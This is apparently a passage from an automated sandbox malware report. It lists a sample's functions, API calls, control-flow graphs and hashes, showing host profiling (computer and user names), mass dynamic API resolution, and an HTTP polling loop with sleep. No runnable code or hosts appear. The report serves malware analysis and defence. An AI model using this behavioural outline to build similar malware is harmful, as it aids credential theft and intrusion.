                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: b33cd813b1706f02dcd7cf5823dc1bee293dceb01aef9a382369ac7b74f208e5
                  • Instruction ID: 056d8573c82c635a11a25ee84cbf97b08445409132863facb0e1be6f8df57c23
                  • Opcode Fuzzy Hash: b33cd813b1706f02dcd7cf5823dc1bee293dceb01aef9a382369ac7b74f208e5
                  • Instruction Fuzzy Hash: E4714071A00218ABDB24DFA0DD95FEE77B8FB49700F108158F50A6B5D0DBB46A85CF92
                  Function 009B78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1275 9b78e0-9b7937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 9b7939-9b793e 1275->1276 1277 9b7942-9b7945 1275->1277 1278 9b7962-9b7972 1276->1278 1277->1278
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 009B792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: c44bcc3be535dcd2d97d95cb010cbce0db59a98d03669b7f48850a397ad2f55a
                  • Instruction ID: 9ae094267869d3f9d8e48f222a78404672e4ead41c1cc0b1eb1f641255022352
                  • Opcode Fuzzy Hash: c44bcc3be535dcd2d97d95cb010cbce0db59a98d03669b7f48850a397ad2f55a
                  • Instruction Fuzzy Hash: 6C0186B1904248EBC710DF94DD45BAAFBBCF744B21F104219F545E7280D77459008BA2
                  Function 009B7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009A11B7), ref: 009B7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 009B789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 57cb7c3c3207d416afed08548e04727fc4b6ead9e4f4da8bc2f865655ad598f0
                  • Instruction ID: 69fea295450ad6eeeb85ffb7a835423b0e66dd3da18bbe5cae8724e6a6e4c4bf
                  • Opcode Fuzzy Hash: 57cb7c3c3207d416afed08548e04727fc4b6ead9e4f4da8bc2f865655ad598f0
                  • Instruction Fuzzy Hash: DDF044B1944248ABC700DF94DD85BAEFBBCE744721F100659F605A3680D77825048BA1
                  Function 009A1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: bed1bedc8b3ba0a3fa76a24774cdf5dce96f5afda0c75f848c07d564504cd07a
                  • Instruction ID: c6b3f62f3fe3d61db8ec3b6d64c1e1dd96db557e1a974326e671578a6c1001ca
                  • Opcode Fuzzy Hash: bed1bedc8b3ba0a3fa76a24774cdf5dce96f5afda0c75f848c07d564504cd07a
                  • Instruction Fuzzy Hash: 9CD05E7490430CDBCB00DFE0D8896DDBB7CFB08312F000655E90563340EE306881CAA6
                  Function 009B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 9b9c10-9b9c1a 634 9b9c20-9ba031 GetProcAddress * 43 633->634 635 9ba036-9ba0ca LoadLibraryA * 8 633->635 634->635 636 9ba0cc-9ba141 GetProcAddress * 5 635->636 637 9ba146-9ba14d 635->637 636->637 638 9ba153-9ba211 GetProcAddress * 8 637->638 639 9ba216-9ba21d 637->639 638->639 640 9ba298-9ba29f 639->640 641 9ba21f-9ba293 GetProcAddress * 5 639->641 642 9ba337-9ba33e 640->642 643 9ba2a5-9ba332 GetProcAddress * 6 640->643 641->640 644 9ba41f-9ba426 642->644 645 9ba344-9ba41a GetProcAddress * 9 642->645 643->642 646 9ba428-9ba49d GetProcAddress * 5 644->646 647 9ba4a2-9ba4a9 644->647 645->644 646->647 648 9ba4ab-9ba4d7 GetProcAddress * 2 647->648 649 9ba4dc-9ba4e3 647->649 648->649 650 9ba515-9ba51c 649->650 651 9ba4e5-9ba510 GetProcAddress * 2 649->651 652 9ba612-9ba619 650->652 653 9ba522-9ba60d GetProcAddress * 10 650->653 651->650 654 9ba61b-9ba678 GetProcAddress * 4 652->654 655 9ba67d-9ba684 652->655 653->652 654->655 656 9ba69e-9ba6a5 655->656 657 9ba686-9ba699 GetProcAddress 655->657 658 9ba708-9ba709 656->658 659 9ba6a7-9ba703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,015D6EB0), ref: 009B9C2D
                  • GetProcAddress.KERNEL32(74DD0000,015D6ED0), ref: 009B9C45
                  • GetProcAddress.KERNEL32(74DD0000,015EA498), ref: 009B9C5E
                  • GetProcAddress.KERNEL32(74DD0000,015EA4B0), ref: 009B9C76
                  • GetProcAddress.KERNEL32(74DD0000,015EA4C8), ref: 009B9C8E
                  • GetProcAddress.KERNEL32(74DD0000,015EA558), ref: 009B9CA7
                  • GetProcAddress.KERNEL32(74DD0000,015DCBA8), ref: 009B9CBF
                  • GetProcAddress.KERNEL32(74DD0000,015EDC88), ref: 009B9CD7
                  • GetProcAddress.KERNEL32(74DD0000,015EDC40), ref: 009B9CF0
                  • GetProcAddress.KERNEL32(74DD0000,015EDCB8), ref: 009B9D08
                  • GetProcAddress.KERNEL32(74DD0000,015EDCD0), ref: 009B9D20
                  • GetProcAddress.KERNEL32(74DD0000,015D70F0), ref: 009B9D39
                  • GetProcAddress.KERNEL32(74DD0000,015D7110), ref: 009B9D51
                  • GetProcAddress.KERNEL32(74DD0000,015D7150), ref: 009B9D69
                  • GetProcAddress.KERNEL32(74DD0000,015D6E30), ref: 009B9D82
                  • GetProcAddress.KERNEL32(74DD0000,015EDCE8), ref: 009B9D9A
                  • GetProcAddress.KERNEL32(74DD0000,015EDD60), ref: 009B9DB2
                  • GetProcAddress.KERNEL32(74DD0000,015DCFB8), ref: 009B9DCB
                  • GetProcAddress.KERNEL32(74DD0000,015D6E50), ref: 009B9DE3
                  • GetProcAddress.KERNEL32(74DD0000,015EDCA0), ref: 009B9DFB
                  • GetProcAddress.KERNEL32(74DD0000,015EDDA8), ref: 009B9E14
                  • GetProcAddress.KERNEL32(74DD0000,015EDD18), ref: 009B9E2C
                  • GetProcAddress.KERNEL32(74DD0000,015EDE50), ref: 009B9E44
                  • GetProcAddress.KERNEL32(74DD0000,015D6EF0), ref: 009B9E5D
                  • GetProcAddress.KERNEL32(74DD0000,015EDE68), ref: 009B9E75
                  • GetProcAddress.KERNEL32(74DD0000,015EDC58), ref: 009B9E8D
                  • GetProcAddress.KERNEL32(74DD0000,015EDDC0), ref: 009B9EA6
                  • GetProcAddress.KERNEL32(74DD0000,015EDDD8), ref: 009B9EBE
                  • GetProcAddress.KERNEL32(74DD0000,015EDD90), ref: 009B9ED6
                  • GetProcAddress.KERNEL32(74DD0000,015EDDF0), ref: 009B9EEF
                  • GetProcAddress.KERNEL32(74DD0000,015EDC70), ref: 009B9F07
                  • GetProcAddress.KERNEL32(74DD0000,015EDD00), ref: 009B9F1F
                  • GetProcAddress.KERNEL32(74DD0000,015EDE08), ref: 009B9F38
                  • GetProcAddress.KERNEL32(74DD0000,015EB188), ref: 009B9F50
                  • GetProcAddress.KERNEL32(74DD0000,015EDD48), ref: 009B9F68
                  • GetProcAddress.KERNEL32(74DD0000,015EDB80), ref: 009B9F81
                  • GetProcAddress.KERNEL32(74DD0000,015D6E70), ref: 009B9F99
                  • GetProcAddress.KERNEL32(74DD0000,015EDD30), ref: 009B9FB1
                  • GetProcAddress.KERNEL32(74DD0000,015D6C70), ref: 009B9FCA
                  • GetProcAddress.KERNEL32(74DD0000,015EDD78), ref: 009B9FE2
                  • GetProcAddress.KERNEL32(74DD0000,015EDE20), ref: 009B9FFA
                  • GetProcAddress.KERNEL32(74DD0000,015D6B70), ref: 009BA013
                  • GetProcAddress.KERNEL32(74DD0000,015D6B90), ref: 009BA02B
                  • LoadLibraryA.KERNEL32(015EDE38,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA03D
                  • LoadLibraryA.KERNEL32(015EDB98,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA04E
                  • LoadLibraryA.KERNEL32(015EDBB0,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA060
                  • LoadLibraryA.KERNEL32(015EDBC8,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA072
                  • LoadLibraryA.KERNEL32(015EDBE0,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA083
                  • LoadLibraryA.KERNEL32(015EDBF8,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA095
                  • LoadLibraryA.KERNEL32(015EDC10,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA0A7
                  • LoadLibraryA.KERNEL32(015EDC28,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA0B8
                  • GetProcAddress.KERNEL32(75290000,015D6BB0), ref: 009BA0DA
                  • GetProcAddress.KERNEL32(75290000,015EE060), ref: 009BA0F2
                  • GetProcAddress.KERNEL32(75290000,015E9BF8), ref: 009BA10A
                  • GetProcAddress.KERNEL32(75290000,015EE0A8), ref: 009BA123
                  • GetProcAddress.KERNEL32(75290000,015D6AD0), ref: 009BA13B
                  • GetProcAddress.KERNEL32(734C0000,015DCD38), ref: 009BA160
                  • GetProcAddress.KERNEL32(734C0000,015D6CF0), ref: 009BA179
                  • GetProcAddress.KERNEL32(734C0000,015DD030), ref: 009BA191
                  • GetProcAddress.KERNEL32(734C0000,015EE0C0), ref: 009BA1A9
                  • GetProcAddress.KERNEL32(734C0000,015EDFA0), ref: 009BA1C2
                  • GetProcAddress.KERNEL32(734C0000,015D6D10), ref: 009BA1DA
                  • GetProcAddress.KERNEL32(734C0000,015D6C30), ref: 009BA1F2
                  • GetProcAddress.KERNEL32(734C0000,015EDF40), ref: 009BA20B
                  • GetProcAddress.KERNEL32(752C0000,015D6A90), ref: 009BA22C
                  • GetProcAddress.KERNEL32(752C0000,015D6B50), ref: 009BA244
                  • GetProcAddress.KERNEL32(752C0000,015EDF88), ref: 009BA25D
                  • GetProcAddress.KERNEL32(752C0000,015EE0F0), ref: 009BA275
                  • GetProcAddress.KERNEL32(752C0000,015D6BD0), ref: 009BA28D
                  • GetProcAddress.KERNEL32(74EC0000,015DCC98), ref: 009BA2B3
                  • GetProcAddress.KERNEL32(74EC0000,015DCBD0), ref: 009BA2CB
                  • GetProcAddress.KERNEL32(74EC0000,015EE0D8), ref: 009BA2E3
                  • GetProcAddress.KERNEL32(74EC0000,015D6D30), ref: 009BA2FC
                  • GetProcAddress.KERNEL32(74EC0000,015D6D50), ref: 009BA314
                  • GetProcAddress.KERNEL32(74EC0000,015DCE00), ref: 009BA32C
                  • GetProcAddress.KERNEL32(75BD0000,015EDEE0), ref: 009BA352
                  • GetProcAddress.KERNEL32(75BD0000,015D6D70), ref: 009BA36A
                  • GetProcAddress.KERNEL32(75BD0000,015E9C08), ref: 009BA382
                  • GetProcAddress.KERNEL32(75BD0000,015EE108), ref: 009BA39B
                  • GetProcAddress.KERNEL32(75BD0000,015EDEB0), ref: 009BA3B3
                  • GetProcAddress.KERNEL32(75BD0000,015D6AF0), ref: 009BA3CB
                  • GetProcAddress.KERNEL32(75BD0000,015D6BF0), ref: 009BA3E4
                  • GetProcAddress.KERNEL32(75BD0000,015EE120), ref: 009BA3FC
                  • GetProcAddress.KERNEL32(75BD0000,015EDEF8), ref: 009BA414
                  • GetProcAddress.KERNEL32(75A70000,015D6B10), ref: 009BA436
                  • GetProcAddress.KERNEL32(75A70000,015EDFD0), ref: 009BA44E
                  • GetProcAddress.KERNEL32(75A70000,015EDE80), ref: 009BA466
                  • GetProcAddress.KERNEL32(75A70000,015EE030), ref: 009BA47F
                  • GetProcAddress.KERNEL32(75A70000,015EE018), ref: 009BA497
                  • GetProcAddress.KERNEL32(75450000,015D6D90), ref: 009BA4B8
                  • GetProcAddress.KERNEL32(75450000,015D6C90), ref: 009BA4D1
                  • GetProcAddress.KERNEL32(75DA0000,015D69B0), ref: 009BA4F2
                  • GetProcAddress.KERNEL32(75DA0000,015EDFE8), ref: 009BA50A
                  • GetProcAddress.KERNEL32(6F070000,015D69D0), ref: 009BA530
                  • GetProcAddress.KERNEL32(6F070000,015D69F0), ref: 009BA548
                  • GetProcAddress.KERNEL32(6F070000,015D6CB0), ref: 009BA560
                  • GetProcAddress.KERNEL32(6F070000,015EE048), ref: 009BA579
                  • GetProcAddress.KERNEL32(6F070000,015D6C10), ref: 009BA591
                  • GetProcAddress.KERNEL32(6F070000,015D6A10), ref: 009BA5A9
                  • GetProcAddress.KERNEL32(6F070000,015D6A30), ref: 009BA5C2
                  • GetProcAddress.KERNEL32(6F070000,015D6CD0), ref: 009BA5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 009BA5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 009BA607
                  • GetProcAddress.KERNEL32(75AF0000,015EDE98), ref: 009BA629
                  • GetProcAddress.KERNEL32(75AF0000,015E9C28), ref: 009BA641
                  • GetProcAddress.KERNEL32(75AF0000,015EE138), ref: 009BA659
                  • GetProcAddress.KERNEL32(75AF0000,015EE078), ref: 009BA672
                  • GetProcAddress.KERNEL32(75D90000,015D6C50), ref: 009BA693
                  • GetProcAddress.KERNEL32(6CFB0000,015EE168), ref: 009BA6B4
                  • GetProcAddress.KERNEL32(6CFB0000,015D6A50), ref: 009BA6CD
                  • GetProcAddress.KERNEL32(6CFB0000,015EDF10), ref: 009BA6E5
                  • GetProcAddress.KERNEL32(6CFB0000,015EDEC8), ref: 009BA6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: e7fc0c4d18ab85464c4b2f2c5651587b7104e7360296d750c97d33bdd217f67c
                  • Instruction ID: 6efa1febd29ddcff47fd73ef1db7c4469bb4fc9909dddd0fd52083761942a743
                  • Opcode Fuzzy Hash: e7fc0c4d18ab85464c4b2f2c5651587b7104e7360296d750c97d33bdd217f67c
                  • Instruction Fuzzy Hash: 9A6219B9500280AFC354DFA8EDD89663BFDF78C701715851EA609CB264DE39B881DB63
                  Function 009B5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 858 9b5510-9b5577 call 9b5ad0 call 9ba820 * 3 call 9ba740 * 4 874 9b557c-9b5583 858->874 875 9b55d7-9b564c call 9ba740 * 2 call 9a1590 call 9b52c0 call 9ba8a0 call 9ba800 call 9baad0 StrCmpCA 874->875 876 9b5585-9b55b6 call 9ba820 call 9ba7a0 call 9a1590 call 9b51f0 874->876 901 9b5693-9b56a9 call 9baad0 StrCmpCA 875->901 906 9b564e-9b568e call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 875->906 892 9b55bb-9b55d2 call 9ba8a0 call 9ba800 876->892 892->901 908 9b56af-9b56b6 901->908 909 9b57dc-9b5844 call 9ba8a0 call 9ba820 * 2 call 9a1670 call 9ba800 * 4 call 9b6560 call 9a1550 901->909 906->901 912 9b57da-9b585f call 9baad0 StrCmpCA 908->912 913 9b56bc-9b56c3 908->913 1038 9b5ac3-9b5ac6 909->1038 932 9b5991-9b59f9 call 9ba8a0 call 9ba820 * 2 call 9a1670 call 9ba800 * 4 call 9b6560 call 9a1550 912->932 933 9b5865-9b586c 912->933 917 9b571e-9b5793 call 9ba740 * 2 call 9a1590 call 9b52c0 call 9ba8a0 call 9ba800 call 9baad0 StrCmpCA 913->917 918 9b56c5-9b5719 call 9ba820 call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 913->918 917->912 1018 9b5795-9b57d5 call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 917->1018 918->912 932->1038 939 9b598f-9b5a14 call 9baad0 StrCmpCA 933->939 940 9b5872-9b5879 933->940 969 9b5a28-9b5a91 call 9ba8a0 call 9ba820 * 2 call 9a1670 call 9ba800 * 4 call 9b6560 call 9a1550 939->969 970 9b5a16-9b5a21 Sleep 939->970 948 9b587b-9b58ce call 9ba820 call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 940->948 949 9b58d3-9b5948 call 9ba740 * 2 call 9a1590 call 9b52c0 call 9ba8a0 call 9ba800 call 9baad0 StrCmpCA 940->949 948->939 949->939 1043 9b594a-9b598a call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 949->1043 969->1038 970->874 1018->912 1043->939
                  APIs
                    • Part of subcall function 009BA820: lstrlen.KERNEL32(009A4F05,?,?,009A4F05,009C0DDE), ref: 009BA82B
                    • Part of subcall function 009BA820: lstrcpy.KERNEL32(009C0DDE,00000000), ref: 009BA885
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5857
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5228
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5318
                    • Part of subcall function 009B52C0: lstrlen.KERNEL32(00000000), ref: 009B532F
                    • Part of subcall function 009B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 009B5364
                    • Part of subcall function 009B52C0: lstrlen.KERNEL32(00000000), ref: 009B5383
                    • Part of subcall function 009B52C0: lstrlen.KERNEL32(00000000), ref: 009B53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 009B5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
